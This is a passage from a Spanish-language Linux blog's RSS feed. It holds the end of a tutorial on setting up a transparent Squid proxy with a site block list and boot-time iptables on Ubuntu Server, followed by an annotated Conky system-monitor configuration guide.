<pre class="bash" style="font-family:monospace;"><span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #000000;">1</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>proc<span style="color: #000000; font-weight: bold;">/</span>sys<span style="color: #000000; font-weight: bold;">/</span>net<span style="color: #000000; font-weight: bold;">/</span>ipv4<span style="color: #000000; font-weight: bold;">/</span>ip_forward</pre>
</div>
</div>
<p>Con esto es mas que suficiente, ahora hay que darle permisos de ejecucion</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">chmod</span> a+x <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>init.d<span style="color: #000000; font-weight: bold;">/</span>iptables.cf</pre>
</div>
</div>
<p>Ahora para que se ejecute al arranque instalaremos un pequeño programa que nos ayuda a configurar los archivos que se ejecutan al iniciar el sistema</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> rcconf</pre>
</div>
</div>
<p>y lo ejecutaremos con</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> rcconf</pre>
</div>
</div>
<p>&nbsp;</p>
<p><a href="http://vive-libre.com/blog/wp-content/uploads/2011/05/rcconf.jpeg"><img class="size-medium wp-image-65 aligncenter" title="rcconf" src="http://vive-libre.com/blog/wp-content/uploads/2011/05/rcconf-300x294.jpg" alt="" width="300" height="294" /></a></p>
<p>Veran esta pantalla solo hay que marcar el iptables.cf y todo listo si nececitan correr un archivo al arranque solo concedanle permisos y de la misma forma  : D.</p>
<p>Ahora hay que configurar el Squid, para eso editaremos el siguiente archivo.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">http_port <span style="color: #000000;">3128</span> transparent
cache_mem <span style="color: #000000;">16</span> MB
cache_dir ufs <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>spool<span style="color: #000000; font-weight: bold;">/</span>squid <span style="color: #000000;">700</span> <span style="color: #000000;">16</span> <span style="color: #000000;">256</span>
ie_refresh on
offline_mode on
acl all src 0.0.0.0<span style="color: #000000; font-weight: bold;">/</span>0.0.0.0
acl red_local src 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span>
acl plus src <span style="color: #ff0000;">&quot;/etc/squid/plus.lst&quot;</span>
acl sites url_regex <span style="color: #ff0000;">&quot;/etc/squid/sites.lst&quot;</span>
acl files url_regex <span style="color: #660033;">-i</span> .exe .flv .mp4 .mp3 .avi .wma .mov .acc .wav .bat .asf .mpeg .3gp .swf
acl localhost src 127.0.0.1<span style="color: #000000; font-weight: bold;">/</span>255.255.255.255
http_access deny red_local <span style="color: #000000; font-weight: bold;">!</span>plus sites
http_access deny red_local <span style="color: #000000; font-weight: bold;">!</span>plus files
http_access allow red_local
http_access allow localhost
http_access deny all</pre>
</div>
</div>
<p>Para que esto funciones habremos de crear dos archivos, uno donde se guardaran las paginas que deseamos bloquear, y otro donde tendremos una lista de las ip que  tendran derechos privilegiados <img src='http://vive-libre.com/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">vi</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>squid<span style="color: #000000; font-weight: bold;">/</span>sites.lst</pre>
</div>
</div>
<p>Aqui pondremos las paginas bloqueadas, esta es mi lista, algunas paginas de video redes sociales, mensageros web etc.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">hi5.com
www.metroflog.com
mx.youtube.com
es.youtube.com
www.youtube.com.us
www.youtube.com
www.youtube.com.mx
www.dailymotion.com
www.tu.tv
www.ebuddy.com
www.meebo.com
webmessenger.msn.com
www.webmessenger.msn.com
www.iloveim.com
www.spacelive.com
home.spaces.live.com<span style="color: #000000; font-weight: bold;">/</span>
www.myspace.com<span style="color: #000000; font-weight: bold;">/</span>
spaces.live.com<span style="color: #000000; font-weight: bold;">/</span>
www.radiusim.com<span style="color: #000000; font-weight: bold;">/</span>
www.messengerfx.com
messengerfx.com<span style="color: #000000; font-weight: bold;">/</span>
www.facebook.com<span style="color: #000000; font-weight: bold;">/</span>
fulltono.com<span style="color: #000000; font-weight: bold;">/</span>
www.fulltono.com<span style="color: #000000; font-weight: bold;">/</span>
rapidshare.com
megaupload.com
www.veoh.com<span style="color: #000000; font-weight: bold;">/</span>
www.megavideo.com<span style="color: #000000; font-weight: bold;">/</span>
www.proxybutton.com<span style="color: #000000; font-weight: bold;">/</span>
www.videoblogs.com<span style="color: #000000; font-weight: bold;">/</span>
video.google.com<span style="color: #000000; font-weight: bold;">/</span>
imo.imwww.koolim.com<span style="color: #000000; font-weight: bold;">/</span>
koolim.com<span style="color: #000000; font-weight: bold;">/</span>
voltv.es<span style="color: #000000; font-weight: bold;">/</span>
www.imhaha.com
imhaha.comproxify.com<span style="color: #000000; font-weight: bold;">/</span>
www.proxify.com<span style="color: #000000; font-weight: bold;">/</span>
www.megaclick.com<span style="color: #000000; font-weight: bold;">/</span>
www.myproxy.com
www.blogger.com<span style="color: #000000; font-weight: bold;">/</span>
cbox.wsmegaclilck.com<span style="color: #000000; font-weight: bold;">/</span>
facebook.com<span style="color: #000000; font-weight: bold;">/</span>
youporn.com
www.lajaula.net
www.alianzo.com
www.goear.com
www.zshare.com
zshare.net
skydrive.live.com</pre>
</div>
</div>
<p>Y sigue la lista de direcciones privilegiadas</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">vi</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>squid<span style="color: #000000; font-weight: bold;">/</span>plus.lst</pre>
</div>
</div>
<p>Y agregamos las ip que deseemos</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">192.168.2.150
192.168.2.135</pre>
</div>
</div>
<p>Ahora regresando al archivo de configuracion del squid<br />
Indicamos que por el puerto 3128 escucharemos y que sera proy tranparente</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">http_port <span style="color: #000000;">3128</span> transparent</pre>
</div>
</div>
<p>Estos valores dejarlos tal cual</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">cache_mem <span style="color: #000000;">16</span> MB
cache_dir ufs <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>spool<span style="color: #000000; font-weight: bold;">/</span>squid <span style="color: #000000;">700</span> <span style="color: #000000;">16</span> <span style="color: #000000;">256</span>
ie_refresh on
offline_mode on</pre>
</div>
</div>
<p>Las acl o definiciones de control de acceso, son las que nos permitiran hacer referencias hacia ciertos elementos ya sea ip, direciones etc<br />
La definicion all indica un origen definido por todo el rango de direciones ip</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">acl all src 0.0.0.0<span style="color: #000000; font-weight: bold;">/</span>0.0.0.0</pre>
</div>
</div>
<p>La siguiente definicion hace referencia al conjunto de ip comprendidas dentro de nuestra red</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">acl red_local src 192.168.2.0<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">24</span></pre>
</div>
</div>
<p>La definicion plus hace referencia alas ip que se encuentran listadas dentro del archivo que creamos</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> acl plus src <span style="color: #ff0000;">&quot;/etc/squid/plus.lst&quot;</span></pre>
</div>
</div>
<p>La definicion sites hace referencia ala lista de sitios restringidos</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> acl sites url_regex <span style="color: #ff0000;">&quot;/etc/squid/sites.lst&quot;</span></pre>
</div>
</div>
<p>La definicion files es un conjunto de extenciones las cuales se van a restringir para su descarga, hay que tener un poco de cuidado, por ejemplo los archivos .bin pueden ser desde binarios de linux, como imagenes de cd o archivos comprimidos, si añaden esa extencion se daran cuenta que las busquedas de google desencadenaran el bloqueo del proxy y no les dejara buscar nada, ya que dentro de la url de la busqueda se generan este tipo de extenciones, la cadena .mp bloquea el yahoo mail, asi que sehan cuidadosos es este sentido, y evitense dolores de cabeza.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">acl files url_regex <span style="color: #660033;">-i</span> .exe .flv .mp4 .mp3 .avi .wma .mov .acc .wav .bat .asf .mpeg .3gp .swf</pre>
</div>
</div>
<p>Y por ultimo la definicion del loopback</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> acl localhost src 127.0.0.1<span style="color: #000000; font-weight: bold;">/</span>255.255.255.255</pre>
</div>
</div>
<p>Ahora ay que generar las reglas, para permitir o denegar el acceso usamos http_acces despues la accion deny o allow aquien se lo vamos a aplicar y que le vamos a restringir<br />
Aqui denegamos a todas las direciones de la red que sean diferente a las definidas en la lista plus los sitios definidos por la lista sites</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> http_access deny red_local <span style="color: #000000; font-weight: bold;">!</span>plus sites</pre>
</div>
</div>
<p>De igual forma denegamos a todas las ip de la red local que sean diferentes a las definidas por la lista plus el acceso a los archivo definidos en la lista files</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> http_access deny red_local <span style="color: #000000; font-weight: bold;">!</span>plus files</pre>
</div>
</div>
<p>Muy importante todas las reglas siempre deben de ir antes de estas ultimas de lo contrario el proxy aparentara que no esta funcionando, ya que las reglas llevan un orden de ejecucion</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">http_access allow red_local
http_access allow localhost
http_access deny all</pre>
</div>
</div>
<p>Cada vez que se haga un cambio en las reglas habra que reiniciara el servicio, esto interrunpuria todo el trafico que este pasando por el proxy, hasta que recargue el servcio  segun la velocidad del servidor y la carga de trafico unos 20 o 30 segundo.<br />
Espero sea de utilidad, y como siempre espero sus comentarios, criticas y chiste.<br />
Pd. este post fue motivado por algunas dudas de los amigos del foro de Byte.<br />
Asi que esto es todo<br />
Byte.</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2009/03/03/configuracion-de-ubuntu-server-810-dhcp-squid-iptables/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mini How-to de configuracion de: Conky, El monitor&#8230;</title>
		<link>http://vive-libre.com/blog/2008/10/10/mini-how-to-de-configuracion-de-conky-el-monitor/</link>
		<comments>http://vive-libre.com/blog/2008/10/10/mini-how-to-de-configuracion-de-conky-el-monitor/#comments</comments>
		<pubDate>Fri, 10 Oct 2008 17:23:42 +0000</pubDate>
		<dc:creator>Yovany</dc:creator>
				<category><![CDATA[ALL]]></category>
		<category><![CDATA[CODIGO]]></category>
		<category><![CDATA[MANUALES]]></category>
		<category><![CDATA[UBUNTU]]></category>
		<category><![CDATA[ANDROID]]></category>

		<guid isPermaLink="false">http://vive-libre.com/blog/?p=104</guid>
		<description><![CDATA[sudo apt-get install conky El archivo de configuración .conkyrc se localiza en el directorio personal, como pueden notar al tener el punto antes del nombre nos indica que es un archivo oculto, ahora vamos a ver el siguiente ejemplo: Este es el mio: Y este es el codigo &#160; alignment top_right &#160; background no &#160; ...]]></description>
			<content:encoded><![CDATA[<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">apt-get</span> <span style="color: #c20cb9; font-weight: bold;">install</span> conky</pre>
</div>
</div>
<p>El archivo de configuración .conkyrc se localiza en el directorio personal, como pueden notar al tener el punto antes del nombre nos indica que es un archivo oculto, ahora vamos a ver el siguiente ejemplo:</p>
<p>Este es el mio:</p>
<p style="text-align: center;"><a href="http://vive-libre.com/blog/wp-content/uploads/2011/05/conky.jpg"><img class="aligncenter size-medium wp-image-107" title="conky" src="http://vive-libre.com/blog/wp-content/uploads/2011/05/conky-91x300.jpg" alt="" width="91" height="300" /></a></p>
<p>Y este es el codigo</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">&nbsp;
alignment top_right
&nbsp;
background no
&nbsp;
cpu_avg_samples <span style="color: #000000;">2</span>
net_avg_samples <span style="color: #000000;">2</span>
update_interval <span style="color: #000000;">1</span>
&nbsp;
default_color white
default_shade_color black
default_outline_color blue
&nbsp;
draw_borders no
draw_shades no
&nbsp;
border_margin <span style="color: #000000;">1</span>
border_width <span style="color: #000000;">1</span>
&nbsp;
gap_x <span style="color: #000000;">20</span>
gap_y <span style="color: #000000;">20</span>
&nbsp;
minimum_size <span style="color: #000000;">200</span>
maximum_width <span style="color: #000000;">200</span>
&nbsp;
override_utf8_locale <span style="color: #c20cb9; font-weight: bold;">yes</span>
use_xft <span style="color: #c20cb9; font-weight: bold;">yes</span>
xftfont Terminus:<span style="color: #007800;">size</span>=<span style="color: #000000;">8</span>
xftalpha <span style="color: #000000;">0.8</span>
&nbsp;
own_window <span style="color: #c20cb9; font-weight: bold;">yes</span>
own_window_transparent <span style="color: #c20cb9; font-weight: bold;">yes</span>
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
&nbsp;
use_spacer <span style="color: #c20cb9; font-weight: bold;">yes</span>
double_buffer <span style="color: #c20cb9; font-weight: bold;">yes</span>
no_buffers <span style="color: #c20cb9; font-weight: bold;">yes</span>
&nbsp;
TEXT
<span style="color: #800000;">${color #ffffff}</span><span style="color: #800000;">${font Zekton:style=Bold:pixelsize=30}</span><span style="color: #800000;">${alignc}</span><span style="color: #800000;">${time %H:%M:%S}</span>
<span style="color: #800000;">${color #FFCC66}</span><span style="color: #800000;">${font Zekton:style=Bold:pixelsize=12}</span><span style="color: #800000;">${alignc}</span><span style="color: #800000;">${time %A %d de %B}</span>
<span style="color: #800000;">${color #33CCFF}</span><span style="color: #800000;">${font weather:size=60}</span><span style="color: #800000;">${execi 600 ~/scripts/conditions.sh}</span><span style="color: #800000;">${alignc}</span><span style="color: #800000;">${font}</span><span style="color: #800000;">${execi 1200 ~/scripts/pogodynka.sh}</span>
<span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span>O <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #0077ff}</span>Encendido: <span style="color: #800000;">${color }</span><span style="color: #007800;">$uptime</span>
<span style="color: #800000;">${color }</span><span style="color: #800000;">${font StyleBats:size=14}</span>Q <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #0077ff}</span>Kernel:<span style="color: #800000;">${color }</span><span style="color: #007800;">$kernel</span>
<span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span>A <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #00FF99}</span>CPU-<span style="color: #000000;">1</span>:<span style="color: #800000;">${color }</span> <span style="color: #800000;">${cpu cpu0}</span><span style="color: #000000; font-weight: bold;">%</span>
<span style="color: #800000;">${cpugraph cpu0 20,200 ff0000 0000ff}</span>
<span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span>A <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #00FF99}</span>CPU-<span style="color: #000000;">2</span>:<span style="color: #800000;">${color }</span> <span style="color: #800000;">${cpu cpu1}</span><span style="color: #000000; font-weight: bold;">%</span>
<span style="color: #800000;">${cpugraph cpu1 20,200 ff0000 0000ff}</span>
<span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span>A <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #00FF99}</span>CPU-<span style="color: #000000;">3</span>:<span style="color: #800000;">${color }</span> <span style="color: #800000;">${cpu cpu2}</span><span style="color: #000000; font-weight: bold;">%</span>
<span style="color: #800000;">${cpugraph cpu2 20,200 ff0000 0000ff}</span>
<span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span><span style="color: #000000;">8</span> <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #FF3333}</span>TOP CPU:
<span style="color: #800000;">${color #ddaa00}</span> <span style="color: #800000;">${top name 1}</span><span style="color: #800000;">${top cpu 1}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top name 2}</span><span style="color: #800000;">${top cpu 2}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top name 3}</span><span style="color: #800000;">${top cpu 3}</span>
<span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span><span style="color: #000000;">8</span> <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #FF3333}</span>TOP MEM:
<span style="color: #800000;">${color #ddaa00}</span> <span style="color: #800000;">${top_mem name 1}</span><span style="color: #800000;">${top_mem mem 1}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top_mem name 2}</span><span style="color: #800000;">${top_mem mem 2}</span>
<span style="color: #800000;">${color lightgrey}</span> <span style="color: #800000;">${top_mem name 3}</span><span style="color: #800000;">${top_mem mem 3}</span>
&nbsp;
<span style="color: #800000;">${color #0077ff}</span>MEM:  <span style="color: #800000;">${color }</span> <span style="color: #007800;">$memperc</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #007800;">$mem</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$memmax</span>
<span style="color: #800000;">${membar 4,200}</span>
<span style="color: #800000;">${color #0077ff}</span>SWAP: <span style="color: #800000;">${color }</span> <span style="color: #007800;">$swapperc</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #007800;">$swap</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #007800;">$swapmax</span>
<span style="color: #800000;">${swapbar 4,200}</span>
<span style="color: #800000;">${color #0077ff}</span>ROOT:  <span style="color: #800000;">${color }</span><span style="color: #800000;">${fs_free /}</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${fs_size /}</span>
<span style="color: #800000;">${fs_bar 4,200 /}</span>
<span style="color: #800000;">${color #0077ff}</span>SDA1:  <span style="color: #800000;">${color }</span><span style="color: #800000;">${fs_free /media/sda1}</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${fs_size /media/sda1}</span>
<span style="color: #800000;">${fs_bar 4,200 /media/sda1}</span>
<span style="color: #800000;">${color #0077ff}</span>SDA5:  <span style="color: #800000;">${color }</span><span style="color: #800000;">${fs_free /media/sda5}</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #800000;">${fs_size /media/sda5}</span>
<span style="color: #800000;">${fs_bar 4,200 /media/sda5}</span>
&nbsp;
<span style="color: #800000;">${color #0077ff}</span>WIFI: <span style="color: #800000;">${color #888888}</span>IP: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${addr eth1}</span>
<span style="color: #800000;">${color #0077ff}</span>Senal: <span style="color: #800000;">${color }</span><span style="color: #800000;">${wireless_link_qual_perc eth1}</span> <span style="color: #800000;">${wireless_link_bar 4 eth1}</span>
<span style="color: #800000;">${color #0077ff}</span>DOWN: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${downspeed eth1}</span> k<span style="color: #000000; font-weight: bold;">/</span>s          <span style="color: #800000;">${color #0077ff}</span>UP: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${upspeed eth1}</span> k<span style="color: #000000; font-weight: bold;">/</span>s
<span style="color: #800000;">${color #888888}</span><span style="color: #800000;">${downspeedgraph eth1 25,90 ff0000 0000ff}</span><span style="color: #800000;">${alignr}</span><span style="color: #800000;">${color #888888}</span><span style="color: #800000;">${upspeedgraph eth1 25,90 0000ff ff0000}</span>
<span style="color: #800000;">${color #0077ff}</span>TOTAL: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${totaldown eth1}</span>           <span style="color: #800000;">${color #0077ff}</span>TOTAL: <span style="color: #800000;">${color #CCCCCC}</span><span style="color: #800000;">${totalup eth1}</span></pre>
</div>
</div>
<p>Lo primero que hay que hacer es lo siguiente, como podrán ver el conky tiene unas imagenes en los monitores como iconos, estas solo letras de fuentes especiales entonces instalaremos estas fuentes en nuestro sistema las fuentes a usar son weather y  StyleBats, las encuentran <a title="Fuentes" href="http://www.vive-libre.com/blog/etc/Fuentes.tar.gz" target="_blank">[aqui] </a></p>
<p>Hay que desempaquetar y copiar las fuentes al directorio correspondiente</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"> <span style="color: #c20cb9; font-weight: bold;">tar</span> <span style="color: #660033;">-xzf</span> Fuentes.tar.gz</pre>
</div>
</div>
<p>Nos cambiamos al directorio que acabamos de crear y copiamos las fuentes a una carpeta que crearemos que se llamara misfuentes</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #7a0874; font-weight: bold;">cd</span> Fuentes
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>share<span style="color: #000000; font-weight: bold;">/</span>fonts<span style="color: #000000; font-weight: bold;">/</span>truetype<span style="color: #000000; font-weight: bold;">/</span>misfuentes
<span style="color: #c20cb9; font-weight: bold;">sudo</span> <span style="color: #c20cb9; font-weight: bold;">cp</span> weather.ttf StyleBats.ttf PizzaDude\ Bullets.ttf <span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>share<span style="color: #000000; font-weight: bold;">/</span>fonts<span style="color: #000000; font-weight: bold;">/</span>truetype<span style="color: #000000; font-weight: bold;">/</span>misfuentes</pre>
</div>
</div>
<p>Le indicamos al sistema que actualice las fuentes</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;">fc-cache <span style="color: #660033;">-f</span> <span style="color: #660033;">-v</span></pre>
</div>
</div>
<p>Para poder ver el estado del clima en el conky vamos a usar los siguientes script:</p>
<p>Ahora veremos la configuración de Conky, en lo que se refiere a comportamiento y características del sistema.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#Margen y tamaño del borde en pixeles</span>
border_margin <span style="color: #000000;">1</span>
border_width <span style="color: #000000;">1</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Este es el espacio que tendra de margen el conky con respecto a la pantalla, en estas coordenadas tendra el espacio suficiente para aparecer debajo de la barra superior del escritorio, expresado en pixeles</span>
gap_x <span style="color: #000000;">20</span>
gap_y <span style="color: #000000;">20</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Indicamos el ancho del monitor del conky en pixeles</span>
minimum_size <span style="color: #000000;">200</span>
maximum_width <span style="color: #000000;">200</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Forzar el uso de UTF8</span>
override_utf8_locale <span style="color: #c20cb9; font-weight: bold;">yes</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Si usamos UTF8 es necesario usar xft</span>
use_xft <span style="color: #c20cb9; font-weight: bold;">yes</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Indicamos la fuente y tamano a usar en el monitor</span>
xftfont Terminus:<span style="color: #007800;">size</span>=<span style="color: #000000;">8</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Trasparencia que tendra el texto XFT</span>
xftalpha <span style="color: #000000;">0.8</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Ejecutarlo en su propia ventana en lugar de usar el escritorio (requerido con nautilus)</span>
own_window <span style="color: #c20cb9; font-weight: bold;">yes</span>
&nbsp;
<span style="color: #666666; font-style: italic;">#Usar transparencia con own_window yes/no</span>
own_window_transparent <span style="color: #c20cb9; font-weight: bold;">yes</span>
&nbsp;
<span style="color: #666666; font-style: italic;"># Si pusiste yes en own_window, entonces estos hints del gestor de ventana puede ser utilizado</span>
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
&nbsp;
<span style="color: #666666; font-style: italic;">#Esto es para que se visualize en los demas escritorios, si los usamos</span>
use_spacer <span style="color: #c20cb9; font-weight: bold;">yes</span>
&nbsp;
double_buffer <span style="color: #c20cb9; font-weight: bold;">yes</span>
no_buffers <span style="color: #c20cb9; font-weight: bold;">yes</span></pre>
</div>
</div>
<p>Después de la configuración del Conky, sigue una seccion llamada TEXT, todo lo que pongamos después de esta seccion se visualizara en pantalla, desde un texto como hola, hasta un monitor de X servicio de la computadora, empecemos por algo sencillo.</p>
<p>Para esto se usa una serie de variables o mas bien funciones, a las cuales les pasamos ciertos parametros, y como resultado obtenemos un monitor.</p>
<p>Empecemos con esto:</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${time %H:%M:%S}</span></pre>
</div>
</div>
<p>Aqui estamos invocando a la función time, el %H indica las horas el &#8220;:&#8221; lo imprime tal cual después %M minutos y %S segundos. Si no le ponemos ninguna variable de formato tomara los valores declarados por default.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #ffffff}</span><span style="color: #800000;">${font Zekton:style=Bold:pixelsize=30}</span><span style="color: #800000;">${alignc}</span><span style="color: #800000;">${time %H:%M:%S}</span></pre>
</div>
</div>
<p>Aqui estamos dando algo de formato, a la hora,la primera variable indica el color de la fuente a usa en hexadecimal #ffffff se puede sustituir por cualquier otro valor correspondiente a un color</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #ffffff}</span></pre>
</div>
</div>
<p>Después indicamos otra fuente, estilo y tamaño a usar</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${font Zekton:style=Bold:pixelsize=30}</span></pre>
</div>
</div>
<p>Y por ultimo le indicamos que la alineación sera centrada (solo existe centrada y derecha ${alignr}).</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${alignc}</span></pre>
</div>
</div>
<p>Y la variable a la que se le asigna todo este formato</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${time %H:%M:%S}</span></pre>
</div>
</div>
<p>Cabe hacer la aclaración que este formato es unicamente para esta linea, todas las variables monitores etc.., que se pongan en ese renglón tendra ese formato, si se pone un renglón abajo y no se indica el formato adoptara los valores por default, por eso se repite el formato, en cada renglón.</p>
<p>La siguiente linea es la de la fecha</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #FFCC66}</span><span style="color: #800000;">${font Zekton:style=Bold:pixelsize=12}</span><span style="color: #800000;">${alignc}</span><span style="color: #800000;">${time %A %d de %B}</span></pre>
</div>
</div>
<p>Como se daran cuenta se repite la sección del formato que se le dará a esta variable, color, fuente, estilo, tamaño y alineación.</p>
<p>El %A indica el dia de la semana %d el dia en fecha, &#8220;de&#8221; se imprime tal cual en pantalla, y %B es el mes.</p>
<p>La siguiente linea es la que ejecuta el script conditions.sh y pogodynka.sh que si han el tutorial debería estar en la carpeta scripts dentro de la carpeta personal en home.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color #33CCFF}</span><span style="color: #800000;">${font weather:size=60}</span><span style="color: #800000;">${execi 600 ~/scripts/conditions.sh}</span><span style="color: #800000;">${alignc}</span><span style="color: #800000;">${font}</span><span style="color: #800000;">${execi 1200 ~/scripts/pogodynka.sh}</span></pre>
</div>
</div>
<p>Esta variable execi indica que se ejecutara un script con pid # en la ruta tal donde  ~ es un alias para la ruta del directorio personal, por lo que no hay que cambiarlo</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${execi 600 ~/scripts/conditions.sh}</span>
&nbsp;
<span style="color: #800000;">${execi 1200 ~/scripts/pogodynka.sh}</span> </pre>
</div>
</div>
<p>La siguiente linea sigue el mismo esquema que las anteriores, la variable $uptime indica el tiempo que la computadora ha esto encendida.</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color}</span><span style="color: #800000;">${font StyleBats:size=14}</span>O <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #0077ff}</span>Encendido: <span style="color: #800000;">${color }</span><span style="color: #007800;">$uptime</span></pre>
</div>
</div>
<p>La siguiente linea hace referencia a la variable $kernel que nos da la información del kernel que estamos usando</p>
<div class="wp_syntax">
<div class="code">
<pre class="bash" style="font-family:monospace;"><span style="color: #800000;">${color }</span><span style="color: #800000;">${font StyleBats:size=14}</span>Q <span style="color: #800000;">${font}</span><span style="color: #800000;">${color #0077ff}</span>Kernel:<span style="color: #800000;">${color }</span><span style="color: #007800;">$kernel</span></pre>
</div>
</div>
<p>La siguiente  variable nos dará el porcentaje del uso del cpuX donde X puede ser desde 0 hasta el n procesador que tenga su micro en el ejemplo se tienen 3 procesadores por eso se repite las mismas lineas y cambia a cpu0,cpu1,cpu2,</p>
<div class="wp_syntax">
<div class="code">
